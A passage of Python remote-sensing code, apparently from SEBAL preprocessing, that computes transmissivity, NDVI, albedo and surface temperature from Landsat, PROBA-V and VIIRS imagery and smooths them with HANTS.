SEBAL.save_GeoTiff_proy(Ra_inst_3Km_dest, Transmissivity_3Km, Transmissivity_3Km_fileName, shape_trans, nband=1)
# Reproject Transmissivity to match DEM (now this is done by using the nearest neighbour method)
Transmissivity_inst_dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(Transmissivity_3Km_fileName, cos_zn_fileName, method = 3)
Transmissivity_inst = Transmissivity_inst_dest.GetRasterBand(1).ReadAsArray()
Transmissivity_inst[Transmissivity_inst>0.98] = 0.98
Transmissivity_inst_fileName = os.path.join(TRANS_outfolder,'Transmissivity_inst_%s.tif' %Var_name)
SEBAL.save_GeoTiff_proy(Transmissivity_inst_dest, Transmissivity_inst, Transmissivity_inst_fileName, shape, nband=1)
'''
# Extract the method radiation value
Value_Method_Radiation_24 = '%s' %str(ws['I%d' % number].value)
# Extract the data to the method of radiation
if int(Value_Method_Radiation_24) == 2:
Field_Radiation_24 = '%s' %str(ws['K%d' % number].value)
if Field_Radiation_24 == 'None':
# Daily Transmissivity files must be created
Check_Trans_24 = 1
# Create times that are needed to calculate daily Rs (LANDSAF)
Starttime_GMT = datetime.strptime(Startdate,'%Y-%m-%d') + timedelta(hours=-delta_GTM)
Endtime_GMT = Starttime_GMT + timedelta(days=1)
Times = pd.date_range(Starttime_GMT, Endtime_GMT,freq = '30min')
for Time in Times[:-1]:
year_LANDSAF = Time.year
month_LANDSAF = Time.month
day_LANDSAF = Time.day
hour_LANDSAF = Time.hour
min_LANDSAF = Time.minute
# Define the instantanious LANDSAF file
#re = glob.glob('')
name_Landsaf_inst = 'HDF5_LSASAF_MSG_DSSF_MSG-Disk_%d%02d%02d%02d%02d.tif' %(year_LANDSAF, month_LANDSAF,day_LANDSAF, hour_LANDSAF, min_LANDSAF)
file_Landsaf_inst = os.path.join(DSSF_Folder,name_Landsaf_inst)
# Open the Rs LANDSAF data
dest_Rs_inst_3Km = gdal.Open(file_Landsaf_inst)
Rs_one_3Km = dest_Rs_inst_3Km.GetRasterBand(1).ReadAsArray()
Rs_one_3Km = np.float_(Rs_one_3Km)/10
Rs_one_3Km[Rs_one_3Km < 0]=np.nan
if Time == Times[0]:
Rs_24_3Km_tot = Rs_one_3Km
else:
Rs_24_3Km_tot += Rs_one_3Km
Rs_24_3Km = Rs_24_3Km_tot / len(Times[:-1])
# Reproject the Ra_inst data to match the LANDSAF data
Ra_24_3Km_dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(Ra_mountain_24_fileName, file_Landsaf_inst, method = 3)
Ra_24_3Km = Ra_24_3Km_dest.GetRasterBand(1).ReadAsArray()
Ra_24_3Km[Ra_24_3Km==0] = np.nan
# Do gapfilling
Ra_24_3Km = gap_filling(Ra_24_3Km,np.nan)
# Get shape LANDSAF data
shape_trans=[dest_Rs_inst_3Km.RasterXSize , dest_Rs_inst_3Km.RasterYSize ]
# Calculate Transmissivity 3Km
Transmissivity_24_3Km = Rs_24_3Km/Ra_24_3Km
Transmissivity_24_3Km_fileName = os.path.join(temp_folder_PreSEBAL,'Transmissivity_24_3Km.tif')
SEBAL.save_GeoTiff_proy(Ra_24_3Km_dest, Transmissivity_24_3Km, Transmissivity_24_3Km_fileName, shape_trans, nband=1)
# Reproject Transmissivity to match DEM (now this is done by using the nearest neighbour method)
Transmissivity_24_dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(Transmissivity_24_3Km_fileName, lon_fileName, method = 3)
Transmissivity_24 = Transmissivity_24_dest.GetRasterBand(1).ReadAsArray()
Transmissivity_24[Transmissivity_24>0.98] = 0.98
Transmissivity_24_fileName = os.path.join(TRANS_outfolder,'Transmissivity_24_%s.tif' %Var_name)
SEBAL.save_GeoTiff_proy(Transmissivity_24_dest, Transmissivity_24, Transmissivity_24_fileName, shape, nband=1)
#################### Calculate NDVI for LANDSAT ##########################################
if Image_Type == 1:
# Define bands used for each Landsat number
if Landsat_nr == 5 or Landsat_nr == 7:
Bands = np.array([1, 2, 3, 4, 5, 7, 6])
elif Landsat_nr == 8:
Bands = np.array([2, 3, 4, 5, 6, 7, 10, 11])
else:
print('Landsat image not supported, use Landsat 7 or 8')
# Open MTL landsat and get the correction parameters
Landsat_meta_fileName = os.path.join(input_folder, '%s_MTL.txt' % Name_Landsat_Image)
Lmin, Lmax, k1_c, k2_c = SEBAL.info_band_metadata(Landsat_meta_fileName, Bands)
# Mean solar exo-atmospheric irradiance for each band (W/m2/microm)
# for the different Landsat images (L5, L7, or L8)
ESUN_L5 = np.array([1983, 1796, 1536, 1031, 220, 83.44])
ESUN_L7 = np.array([1997, 1812, 1533, 1039, 230.8, 84.9])
ESUN_L8 = np.array([1973.28, 1842.68, 1565.17, 963.69, 245, 82.106])
# Open one band - To get the metadata of the landsat images only once (to get the extend)
src_FileName = os.path.join(input_folder, '%s_B2.TIF' % Name_Landsat_Image) # before 10!
ls,band_data,ulx,uly,lrx,lry,x_size_ls,y_size_ls = SEBAL.Get_Extend_Landsat(src_FileName)
# Crop the Landsat images to the DEM extent -
dst_FileName = os.path.join(temp_folder_PreSEBAL,'cropped_LS_b2.tif') # Before 10 !!
# Clip the landsat image to match the DEM map
lsc, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(src_FileName, lon_fileName)
data_LS = lsc.GetRasterBand(1).ReadAsArray()
SEBAL.save_GeoTiff_proy(dest, data_LS, dst_FileName, shape, nband=1)
# Get the extend of the remaining landsat file after clipping based on the DEM file
lsc,band_data,ulx,uly,lrx,lry,x_size_lsc,y_size_lsc = SEBAL.Get_Extend_Landsat(dst_FileName)
# Create the corrected signals of Landsat in 1 array
Reflect = SEBAL.Landsat_Reflect(Bands,input_folder,Name_Landsat_Image,output_folder,shape,Lmax,Lmin,ESUN_L5,ESUN_L7,ESUN_L8,cos_zn_resh,dr,Landsat_nr, cos_zn_fileName)
# Calculate temporal water mask
water_mask_temp=SEBAL.Water_Mask(shape,Reflect)
# Calculate NDVI
NDVI = SEBAL.Calc_NDVI(Reflect)
# Calculate albedo
albedo = SEBAL.Calc_albedo(Reflect)
# Save NDVI
NDVI_FileName = os.path.join(NDVI_outfolder,'NDVI_LS_%s.tif'%Var_name)
SEBAL.save_GeoTiff_proy(dest, NDVI, NDVI_FileName, shape, nband=1)
# Save albedo
albedo_FileName = os.path.join(Albedo_outfolder,'Albedo_LS_%s.tif'%Var_name)
SEBAL.save_GeoTiff_proy(dest, albedo, albedo_FileName, shape, nband=1)
################### Extract Meteo data for Landsat days from SEBAL Excel ##################
# Open the Meteo_Input sheet
ws = wb['Meteo_Input']
# ---------------------------- Instantaneous Air Temperature ------------
# Open meteo data, first try to open as value, otherwise as string (path)
try:
Temp_inst = float(ws['B%d' %number].value) # Instantaneous Air Temperature (°C)
# if the data is not a value, than open as a string
except:
Temp_inst_name = '%s' %str(ws['B%d' %number].value)
Temp_inst_fileName = os.path.join(temp_folder_PreSEBAL, 'Temp_inst_input.tif')
Temp_inst = SEBAL.Reshape_Reproject_Input_data(Temp_inst_name, Temp_inst_fileName, lon_fileName)
try:
RH_inst = float(ws['D%d' %number].value) # Instantaneous Relative humidity (%)
# if the data is not a value, than open as a string
except:
RH_inst_name = '%s' %str(ws['D%d' %number].value)
RH_inst_fileName = os.path.join(temp_folder_PreSEBAL, 'RH_inst_input.tif')
RH_inst = SEBAL.Reshape_Reproject_Input_data(RH_inst_name, RH_inst_fileName, lon_fileName)
esat_inst = 0.6108 * np.exp(17.27 * Temp_inst / (Temp_inst + 237.3))
eact_inst = RH_inst * esat_inst / 100
#################### Calculate NDVI for VIIRS-PROBAV ##########################################
if Image_Type == 2:
if Name_PROBAV_Image == 'None':
offset_all = [-1, 1, -2, 2, -3, 3,-4, 4,-5 ,5 ,-6 , 6, -7, 7, -8, 8]
found_Name_PROBAV_Image = 0
for offset in offset_all:
if found_Name_PROBAV_Image == 1:
continue
else:
try:
Name_PROBAV_Image = SEBAL_RUNS[number + offset]['PROBA_V_name']
if not Name_PROBAV_Image == 'None':
found_Name_PROBAV_Image = 1
except:
pass
# Get the day and time from the PROBA-V
Band_PROBAVhdf_fileName = os.path.join(input_folder, '%s.HDF5' % (Name_PROBAV_Image))
g=gdal.Open(Band_PROBAVhdf_fileName, gdal.GA_ReadOnly)
Meta_data = g.GetMetadata()
Date_PROBAV = str(Meta_data['LEVEL3_RADIOMETRY_BLUE_OBSERVATION_START_DATE'])
year = int(Date_PROBAV.split("-")[0])
month = int(Date_PROBAV.split("-")[1])
day = int(Date_PROBAV.split("-")[2])
Var_name_2 = '%d%02d%02d' %(year, month, day)
# Define the output name
NDVI_FileName = os.path.join(NDVI_outfolder,'NDVI_PROBAV_%s.tif' %Var_name_2)
Albedo_FileName = os.path.join(Albedo_outfolder, 'Albedo_PROBAV_%s.tif' %Var_name_2)
water_mask_temp_FileName = os.path.join(WaterMask_outfolder, 'Water_Mask_PROBAV_%s.tif' %Var_name_2)
else:
NDVI_FileName = os.path.join(NDVI_outfolder,'NDVI_PROBAV_%s.tif' %Var_name)
Albedo_FileName = os.path.join(Albedo_outfolder, 'Albedo_PROBAV_%s.tif' %Var_name)
water_mask_temp_FileName = os.path.join(WaterMask_outfolder, 'Water_Mask_PROBAV_%s.tif' %Var_name)
# vegetation maps that will be generated
if not os.path.exists(NDVI_FileName):
# Define the bands that will be used
bands=['SM', 'B1', 'B2', 'B3', 'B4'] #'SM', 'BLUE', 'RED', 'NIR', 'SWIR'
# Set the index number at 0
index=0
# create a zero array with the shape of the reprojected DEM file
data_PROBAV=np.zeros((shape[1], shape[0]))
spectral_reflectance_PROBAV=np.zeros([shape[1], shape[0], 5])
# constants
n188_float=248 # Now it is 248, but we do not exactly know what this really means and if this is for constant for all images.
# write the data one by one to the spectral_reflectance_PROBAV
for bandnmr in bands:
# Translate the PROBA-V names to the Landsat band names
Band_number = {'SM':7,'B1':8,'B2':10,'B3':9,'B4':11}
# Open the dataset
Band_PROBAVhdf_fileName = os.path.join(input_folder, '%s.HDF5' % (Name_PROBAV_Image))
g=gdal.Open(Band_PROBAVhdf_fileName, gdal.GA_ReadOnly)
# define data if it is not there yet
if not 'Var_name' in locals():
Meta_data = g.GetMetadata()
Date_PROBAV = str(Meta_data['LEVEL3_RADIOMETRY_BLUE_OBSERVATION_START_DATE'])
year = int(Date_PROBAV.split("-")[0])
month = int(Date_PROBAV.split("-")[0])
day = int(Date_PROBAV.split("-")[0])
Var_name = '%d%02d%02d' %(year, month, day)
# Open the .hdf file
name_out = os.path.join(input_folder, '%s_test.tif' % (Name_PROBAV_Image))
name_in = g.GetSubDatasets()[Band_number[bandnmr]][0]
# Get environmental variable
SEBAL_env_paths = os.environ["SEBAL"].split(';')
GDAL_env_path = SEBAL_env_paths[0]
GDAL_TRANSLATE = os.path.join(GDAL_env_path, 'gdal_translate.exe')
# run gdal translate command
FullCmd = '%s -of GTiff %s %s' %(GDAL_TRANSLATE, name_in, name_out)
SEBAL.Run_command_window(FullCmd)
# Open data
dest_PV = gdal.Open(name_out)
Data = dest_PV.GetRasterBand(1).ReadAsArray()
dest_PV = None
# Remove temporary file
os.remove(name_out)
# Define the x and y spacing
Meta_data = g.GetMetadata()
Lat_Bottom = float(Meta_data['LEVEL3_GEOMETRY_BOTTOM_LEFT_LATITUDE'])
Lat_Top = float(Meta_data['LEVEL3_GEOMETRY_TOP_RIGHT_LATITUDE'])
Lon_Left = float(Meta_data['LEVEL3_GEOMETRY_BOTTOM_LEFT_LONGITUDE'])
Lon_Right = float(Meta_data['LEVEL3_GEOMETRY_TOP_RIGHT_LONGITUDE'])
Pixel_size = float((Meta_data['LEVEL3_GEOMETRY_VNIR_VAA_MAPPING']).split(' ')[-3])
# Define the georeference of the PROBA-V data
geo_PROBAV=[Lon_Left-0.5*Pixel_size, Pixel_size, 0, Lat_Top+0.5*Pixel_size, 0, -Pixel_size] #0.000992063492063
# Define the name of the output file
PROBAV_data_name=os.path.join(input_folder, '%s_%s.tif' % (Name_PROBAV_Image,bandnmr))
dst_fileName=os.path.join(input_folder, PROBAV_data_name)
# create gtiff output with the PROBA-V band
fmt = 'GTiff'
driver = gdal.GetDriverByName(fmt)
dst_dataset = driver.Create(dst_fileName, int(Data.shape[1]), int(Data.shape[0]), 1,gdal.GDT_Float32)
dst_dataset.SetGeoTransform(geo_PROBAV)
# set the reference info
srs = osr.SpatialReference()
srs.SetWellKnownGeogCS("WGS84")
dst_dataset.SetProjection(srs.ExportToWkt())
# write the array in the geotiff band
dst_dataset.GetRasterBand(1).WriteArray(Data)
dst_dataset = None
# Open the PROBA-V band in SEBAL
g=gdal.Open(PROBAV_data_name.replace("\\","/"))
# If the data cannot be opened, change the extension
if g is None:
PROBAV_data_name=os.path.join(input_folder, '%s_%s.tiff' % (Name_PROBAV_Image,bandnmr))
# Reproject the PROBA-V band to match DEM's resolution
PROBAV, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(
PROBAV_data_name, lon_fileName)
# Open the reprojected PROBA-V band data
data_PROBAV_DN = PROBAV.GetRasterBand(1).ReadAsArray(0, 0, ncol, nrow)
# Define the filename to store the cropped Landsat image
dst_FileName = os.path.join(output_folder, 'Output_PROBAV','proy_PROBAV_%s.tif' % bandnmr)
# close the PROBA-V
g=None
# If the band data is not SM change the DN values into PROBA-V values and write into the spectral_reflectance_PROBAV
if bandnmr is not 'SM':
data_PROBAV[:, :]=data_PROBAV_DN/2000
spectral_reflectance_PROBAV[:, :, index]=data_PROBAV[:, :]
# If the band data is the SM band than write the data into the spectral_reflectance_PROBAV and create cloud mask
else:
data_PROBAV[:, :]=data_PROBAV_DN
Cloud_Mask_PROBAV=np.zeros((shape[1], shape[0]))
Cloud_Mask_PROBAV[data_PROBAV[:,:]!=n188_float]=1
spectral_reflectance_PROBAV[:, :, index]=Cloud_Mask_PROBAV
# Change the spectral reflectance to meet certain limits
spectral_reflectance_PROBAV[:, :, index]=np.where(spectral_reflectance_PROBAV[:, :, index]<=0,np.nan,spectral_reflectance_PROBAV[:, :, index])
spectral_reflectance_PROBAV[:, :, index]=np.where(spectral_reflectance_PROBAV[:, :, index]>=150,np.nan,spectral_reflectance_PROBAV[:, :, index])
# Go to the next index
index=index+1
# Bands in PROBAV spectral reflectance
# 0 = MS
# 1 = BLUE
# 2 = NIR
# 3 = RED
# 4 = SWIR
# Calculate surface albedo based on PROBA-V
Surface_Albedo_PROBAV = 0.219 * spectral_reflectance_PROBAV[:, :, 1] + 0.361 * spectral_reflectance_PROBAV[:, :, 2] + 0.379 * spectral_reflectance_PROBAV[:, :, 3] + 0.041 * spectral_reflectance_PROBAV[:, :, 4]
# Calculate the NDVI based on PROBA-V
n218_memory = spectral_reflectance_PROBAV[:, :, 2] + spectral_reflectance_PROBAV[:, :, 3]
NDVI = np.zeros((shape[1], shape[0]))
NDVI[n218_memory != 0] = ( spectral_reflectance_PROBAV[:, :, 3][n218_memory != 0] - spectral_reflectance_PROBAV[:, :, 2][n218_memory != 0] )/ ( spectral_reflectance_PROBAV[:, :, 2][n218_memory != 0] + spectral_reflectance_PROBAV[:, :, 3][n218_memory != 0] )
# Create Water mask based on PROBA-V
water_mask_temp = np.zeros((shape[1], shape[0]))
water_mask_temp[np.logical_and(np.logical_and(NDVI<0.1,data_DEM>0),Surface_Albedo_PROBAV<0.2)]=1
# Save Albedo for PROBA-V
SEBAL.save_GeoTiff_proy(dest, Surface_Albedo_PROBAV, Albedo_FileName, shape, nband=1)
# Save NDVI for PROBA-V
SEBAL.save_GeoTiff_proy(dest, NDVI, NDVI_FileName, shape, nband=1)
# Save Water Mask for PROBA-V
SEBAL.save_GeoTiff_proy(dest, water_mask_temp, water_mask_temp_FileName, shape, nband=1)
else:
dest_NDVI = gdal.Open(NDVI_FileName)
dest_water_mask_temp = gdal.Open(water_mask_temp_FileName)
NDVI = dest_NDVI.GetRasterBand(1).ReadAsArray()
water_mask_temp = dest_water_mask_temp.GetRasterBand(1).ReadAsArray()
############################ Calculate LAI ##########################################
# Calculate the LAI
FPAR,tir_emis,Nitrogen,vegt_cover,LAI,b10_emissivity = SEBAL.Calc_vegt_para(NDVI,water_mask_temp,shape)
# Create LAI name
if Image_Type == 1:
LAI_FileName = os.path.join(LAI_outfolder,'LAI_LS_%s.tif' %Var_name)
SEBAL.save_GeoTiff_proy(dest, LAI, LAI_FileName, shape, nband=1)
#################### Calculate thermal for Landsat ##########################################
if Image_Type == 1:
# Calculate thermal
therm_data = SEBAL.Landsat_therm_data(Bands,input_folder,Name_Landsat_Image,output_folder,ulx_dem,lry_dem,lrx_dem,uly_dem,shape)
# Calculate surface temperature
Surface_temp=SEBAL.Calc_surface_water_temp(Temp_inst,Landsat_nr,Lmax,Lmin,therm_data,b10_emissivity,k1_c,k2_c,eact_inst,shape,water_mask_temp,Bands_thermal,Rp,tau_sky,surf_temp_offset,Image_Type)
# Save surface temperature
therm_data_FileName = os.path.join(Surface_Temperature_outfolder,'Surface_Temperature_LS_%s.tif' %Var_name)
SEBAL.save_GeoTiff_proy(dest, Surface_temp, therm_data_FileName, shape, nband=1)
################################## Calculate VIIRS surface temperature ########################
if Image_Type == 2:
# If there is VIIRS data
if not Name_VIIRS_Image_TB == 'None':
# Define the VIIRS thermal data name
VIIRS_data_name=os.path.join(input_folder, '%s' % (Name_VIIRS_Image_TB))
# Reproject VIIRS thermal data
VIIRS, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(VIIRS_data_name, lon_fileName)
# Open VIIRS thermal data
data_VIIRS = VIIRS.GetRasterBand(1).ReadAsArray()
# Set the conditions for the brightness temperature (100m)
brightness_temp=np.where(data_VIIRS>=250, data_VIIRS, np.nan)
# Constants
k1=606.399172
k2=1258.78
L_lambda_b10_100=((2*6.63e-34*(3.0e8)**2)/((11.45e-6)**5*(np.exp((6.63e-34*3e8)/(1.38e-23*(11.45e-6)*brightness_temp))-1)))*1e-6
# Get Temperature for 100 and 375m resolution
Temp_TOA_100 = SEBAL.Get_Thermal(L_lambda_b10_100,Rp,Temp_inst,tau_sky,tir_emis,k1,k2)
# Conditions for surface temperature (100m)
n120_surface_temp=Temp_TOA_100.clip(250, 450)
# Save the surface temperature of the VIIRS in 100m resolution
temp_surface_100_fileName_beforeTS = os.path.join(Surface_Temperature_outfolder,'Surface_Temperature_VIIRS_%s.tif' %Var_name)
SEBAL.save_GeoTiff_proy(dest, n120_surface_temp, temp_surface_100_fileName_beforeTS, shape, nband=1)
###################################################################################################################
################################################### HANTS part 4 ##################################################
###################################################################################################################
# Select files for PROBA-V that needs to be used (sometimes a composite product is used)
PROBA_V_Dict = {}
for k, v in SEBAL_RUNS.iteritems():
if str(v['PROBA_V_name']) != 'None':
PROBA_V_Dict.setdefault(v['PROBA_V_name'], []).append(k)
Amount_Unique_PROBA_V_images = len(PROBA_V_Dict.keys())
Back_names = []
# Define HANTS PROBA-V variables
VARS = ["NDVI", "Albedo"]
for VAR in VARS:
output_folder_preprocessing_VAR = os.path.join(output_folder_PreSEBAL_SEBAL, VAR)
os.chdir(output_folder_preprocessing_VAR)
for PROBA_V_image in PROBA_V_Dict.keys():
Band_PROBAVhdf_fileName = os.path.join(input_folder_SEBAL, '%s.HDF5' % (PROBA_V_image))
g=gdal.Open(Band_PROBAVhdf_fileName, gdal.GA_ReadOnly)
Meta_data = g.GetMetadata()
Date_PROBAV = str(Meta_data['LEVEL3_RADIOMETRY_BLUE_OBSERVATION_START_DATE'])
year = int(Date_PROBAV.split("-")[0])
month = int(Date_PROBAV.split("-")[1])
day = int(Date_PROBAV.split("-")[2])
Back_name = '%s_PROBAV_%d%02d%02d.tif' %(VAR, year, month, day)
# Create HANTS input NDVI
input_folder_HANTS_VAR = os.path.join(temp_folder_PreSEBAL, VAR)
if not os.path.exists(input_folder_HANTS_VAR):
os.mkdir(input_folder_HANTS_VAR)
shutil.copy(os.path.join(output_folder_preprocessing_VAR,Back_name),os.path.join(input_folder_HANTS_VAR,Back_name))
# VIIRS parameter copy
VIIRS_Dict = {}
for k, v in SEBAL_RUNS.iteritems():
if str(v['VIIRS_name']) != 'None':
VIIRS_Dict.setdefault(v['VIIRS_name'], []).append(k)
THERM = 'Surface_Temperature'
output_folder_preprocessing_THERM = os.path.join(output_folder_PreSEBAL_SEBAL, THERM)
for VIIRS_image in VIIRS_Dict.keys():
try:
Date_VIIRS = (VIIRS_image.split("d")[1])
year = int(Date_VIIRS.split("-")[0][0:4])
month = int(Date_VIIRS.split("-")[0][4:6])
day = int(Date_VIIRS.split("-")[0][6:8])
except:
Date_VIIRS = (VIIRS_image.split("_")[3])
year = int(Date_VIIRS.split("-")[0][0:4])
month = int(Date_VIIRS.split("-")[0][4:6])
day = int(Date_VIIRS.split("-")[0][6:8])
Back_name_TB = '%s_VIIRS_%d%02d%02d.tif' %(THERM, year, month, day)
# Create HANTS input NDVI
input_folder_HANTS_THERM = os.path.join(temp_folder_PreSEBAL, THERM)
if not os.path.exists(input_folder_HANTS_THERM):
os.mkdir(input_folder_HANTS_THERM)
shutil.copy(os.path.join(output_folder_preprocessing_THERM,Back_name_TB),os.path.join(input_folder_HANTS_THERM,Back_name_TB))
############################################ Solve shift in PROBA=V ##############################################
VAR = 'Albedo'
os.chdir(os.path.join(temp_folder_PreSEBAL, VAR))
re = glob.glob('%s*.tif' %(VAR))
i = 0
while i < int(len(re)-1):
filename1 = re[0] # maak hier misschien later van dat alleen 0 word genomen als de hoeveelheid pixels minder dan 40% van totaal is
filename2 = re[i + 1]
dest1 = gdal.Open(filename1)
dest2 = gdal.Open(filename2)
Array1 = dest1.GetRasterBand(1).ReadAsArray().flatten()
Array2 = dest2.GetRasterBand(1).ReadAsArray().flatten()
Array3 = dest1.GetRasterBand(1).ReadAsArray()[1:,:].flatten()
Array4 = dest2.GetRasterBand(1).ReadAsArray()[:-1,:].flatten()
Array1_flat = Array1[np.logical_and(~np.isnan(Array1),~np.isnan(Array2))]
Array2_flat = Array2[np.logical_and(~np.isnan(Array1),~np.isnan(Array2))]
Array3_flat = Array3[np.logical_and(~np.isnan(Array3),~np.isnan(Array4))]
Array4_flat = Array4[np.logical_and(~np.isnan(Array3),~np.isnan(Array4))]
Corr = np.corrcoef(Array1_flat,Array2_flat)[0,1]
Corr2 = np.corrcoef(Array3_flat,Array4_flat)[0,1]
if Corr2 > Corr:
x,y = dest1.GetRasterBand(1).ReadAsArray().shape
for VAR_check in VARS:
os.chdir(os.path.join(temp_folder_PreSEBAL, VAR_check))
endname = filename2.split('_')[-1]
re_vars = glob.glob('%s*_%s' %(VAR_check,endname))
filename3 = re_vars[0]
dest3 = gdal.Open(filename3)
New_Array = np.ones(dest1.GetRasterBand(1).ReadAsArray().shape) * np.nan
New_Array[1:,:] = dest3.GetRasterBand(1).ReadAsArray()[:-1,:]
filename_out = os.path.join(temp_folder_PreSEBAL, VAR_check, filename3)
SEBAL.save_GeoTiff_proy(dest3, New_Array, filename_out, [int(y),int(x)], nband=1)
i += 1
################################################### General HANTS ###############################################
# Open one image
PROBA_V_IMAGE = os.path.join(input_folder_HANTS_VAR,Back_name)
destPROBAV = gdal.Open(PROBA_V_IMAGE)
VIIRS_IMAGE = os.path.join(input_folder_HANTS_THERM,Back_name_TB)
destVIIRS = gdal.Open(VIIRS_IMAGE)
# Get Geotransform
Geo_PROBAV = destPROBAV.GetGeoTransform()
x_size_PROBAV = destPROBAV.RasterXSize
y_size_PROBAV = destPROBAV.RasterYSize
Geo_VIIRS = destVIIRS.GetGeoTransform()
x_size_VIIRS = destVIIRS.RasterXSize
y_size_VIIRS = destVIIRS.RasterYSize
# Get projection
proj = Get_epsg(destPROBAV)
projVIIRS = Get_epsg(destVIIRS)
# Data parameters
latlim = [Geo_PROBAV[3] + y_size_PROBAV * Geo_PROBAV[5],Geo_PROBAV[3]]
lonlim = [Geo_PROBAV[0], Geo_PROBAV[0] + x_size_PROBAV * Geo_PROBAV[1]]
cellsize = Geo_PROBAV[1]
latlimVIIRS = [Geo_VIIRS [3] + y_size_VIIRS * Geo_VIIRS [5],Geo_VIIRS [3]]
lonlimVIIRS = [Geo_VIIRS [0], Geo_VIIRS [0] + x_size_VIIRS * Geo_VIIRS [1]]
cellsizeVIIRS = Geo_VIIRS [1]
# Get the HANTS parameters
ws_para = wb_veg['HANTS_Input']
# amount of images
Dates = pd.date_range(start_date, end_date, freq = 'D')
###################################################### HANTS Thermal ###############################################
# Define parameters for the NDVI
THERM = 'Surface_Temperature'
# Define paths for NDVI
input_folder_HANTS_THERM = os.path.join(temp_folder_PreSEBAL, THERM)
name_format = '%s_VIIRS_{0}.tif' %THERM
nc_path_TB = os.path.join(input_folder_HANTS_THERM,'%s_NC.nc' %THERM)
# Create Output folder
rasters_path_out = os.path.join(temp_folder_PreSEBAL, THERM + "_HANTS")
if not os.path.exists(rasters_path_out):
os.mkdir(rasters_path_out)
# HANTS parameters for NDVI
nb = int(len(Dates))
Dates = pd.date_range(start_date, end_date, freq = 'D')
nf = int(ws_para['D2'].value) # number of frequencies to be considered above the zero frequency
low = float(ws_para['D3'].value) # valid range minimum
high = float(ws_para['D4'].value) # valid range maximum
HiLo = str(ws_para['D5'].value) # 2-character string indicating rejection of high or low outliers
fet = float(ws_para['D6'].value) # fit error tolerance (point eviating more than fet from curve fit are rejected)
delta = float(ws_para['D7'].value) # small positive number e.g. 0.1 to supress high amplitudes
dod = float(ws_para['D8'].value) # degree of overdeterminedness (iteration stops if number of points reaches the minimum required for curve fitting, plus dod). This is a safety measure
from SEBAL.hants import wa_gdal
# Run
wa_gdal.run_HANTS(input_folder_HANTS_THERM, name_format,
start_date, end_date, latlimVIIRS, lonlimVIIRS, cellsizeVIIRS, nc_path_TB,
nb, nf, HiLo, low, high, fet, dod, delta,
projVIIRS, -9999.0, rasters_path_out, export_hants_only=True)
###################################################### HANTS NDVI ###############################################
# Define parameters for the NDVI
VAR = 'NDVI'
# Define paths for NDVI
input_folder_HANTS_VAR = os.path.join(temp_folder_PreSEBAL, VAR)
name_format = '%s_PROBAV_{0}.tif' %VAR
nc_path_ndvi = os.path.join(input_folder_HANTS_VAR,'%s_NC.nc' %VAR)
# Create Output folder
rasters_path_out = os.path.join(temp_folder_PreSEBAL, VAR + "_HANTS")
if not os.path.exists(rasters_path_out):
os.mkdir(rasters_path_out)
# HANTS parameters for NDVI # Dates = pd.date_range(start_date, end_date, freq = '5D')
nb = int(len(Dates)) # nr of images
nf = int(ws_para['C2'].value) # number of frequencies to be considered above the zero frequency
low = float(ws_para['C3'].value) # valid range minimum
high = float(ws_para['C4'].value) # valid range maximum
HiLo = str(ws_para['C5'].value) # 2-character string indicating rejection of high or low outliers
fet = float(ws_para['C6'].value) # fit error tolerance (point eviating more than fet from curve fit are rejected)
delta = float(ws_para['C7'].value) # small positive number e.g. 0.1 to supress high amplitudes
dod = float(ws_para['C8'].value) # degree of overdeterminedness (iteration stops if number of points reaches the minimum required for curve fitting, plus dod). This is a safety measure
from SEBAL.hants import wa_gdal
# Run
wa_gdal.run_HANTS(input_folder_HANTS_VAR, name_format,
start_date, end_date, latlim, lonlim, cellsize, nc_path_ndvi,
nb, nf, HiLo, low, high, fet, dod, delta,
proj, -9999.0, rasters_path_out, export_hants_only=True)
###################################################### HANTS Albedo ##############################################
# Define parameters for the albedo
VAR = 'Albedo'
# Define paths for NDVI
input_folder_HANTS_VAR = os.path.join(temp_folder_PreSEBAL, VAR)
name_format = '%s_PROBAV_{0}.tif' %VAR
nc_path_albedo = os.path.join(input_folder_HANTS_VAR,'%s_NC.nc' %VAR)
# Create Output folder
rasters_path_out = os.path.join(temp_folder_PreSEBAL, VAR + "_HANTS")
if not os.path.exists(rasters_path_out):
os.mkdir(rasters_path_out)
# HANTS parameters for NDVI
Dates = pd.date_range(start_date, end_date, freq = 'D')
nb = int(len(Dates)) # nr of images
nf = int(ws_para['B2'].value) # number of frequencies to be considered above the zero frequency
low = float(ws_para['B3'].value) # valid range minimum
high = float(ws_para['B4'].value) # valid range maximum
HiLo = str(ws_para['B5'].value) # 2-character string indicating rejection of high or low outliers
fet = float(ws_para['B6'].value) # fit error tolerance (point eviating more than fet from curve fit are rejected)
delta = float(ws_para['B7'].value) # small positive number e.g. 0.1 to supress high amplitudes
dod = float(ws_para['B8'].value) # degree of overdeterminedness (iteration stops if number of points reaches the minimum required for curve fitting, plus dod). This is a safety measure
from SEBAL.hants import wa_gdal
# Run
wa_gdal.run_HANTS(input_folder_HANTS_VAR, name_format,
start_date, end_date, latlim, lonlim, cellsize, nc_path_albedo,
nb, nf, HiLo, low, high, fet, dod, delta,
proj, -9999.0, rasters_path_out, export_hants_only=True)
###################################################################################################################
################################################### post HANTS part 5 #############################################
###################################################################################################################
############################################# Create Outlier maps for PROBA-V #######################################
# Create output folder if not exists
output_folder_HANTS_outliers_PROBAV = os.path.join(temp_folder_PreSEBAL, 'Outliers_PROBAV')
if not os.path.exists(output_folder_HANTS_outliers_PROBAV):
os.mkdir(output_folder_HANTS_outliers_PROBAV)
fh = Dataset(nc_path_albedo, mode='r')
Var = fh.variables.keys()[-1]
lat = fh.variables[fh.variables.keys()[1]][:]
lon = fh.variables[fh.variables.keys()[2]][:]
time = fh.variables[fh.variables.keys()[3]][:]
minimum_lon = np.min(lon)
maximum_lat = np.max(lat)
diff_lon = lon[1] - lon[0]
diff_lat = lat[1] - lat[0]
if not ('shape' in locals() or 'dest' in locals()):
Example_file = os.path.join(output_folder_preprocessing_VAR, Back_name)
dest = gdal.Open(Example_file)
ncol = dest.RasterXSize # Get the reprojected dem column size
nrow = dest.RasterYSize # Get the reprojected dem row size
shape=[ncol, nrow]
for i in range(0,int(np.shape(time)[0])):
time_now = time[i]
data = fh.variables['outliers'][:,:,i]
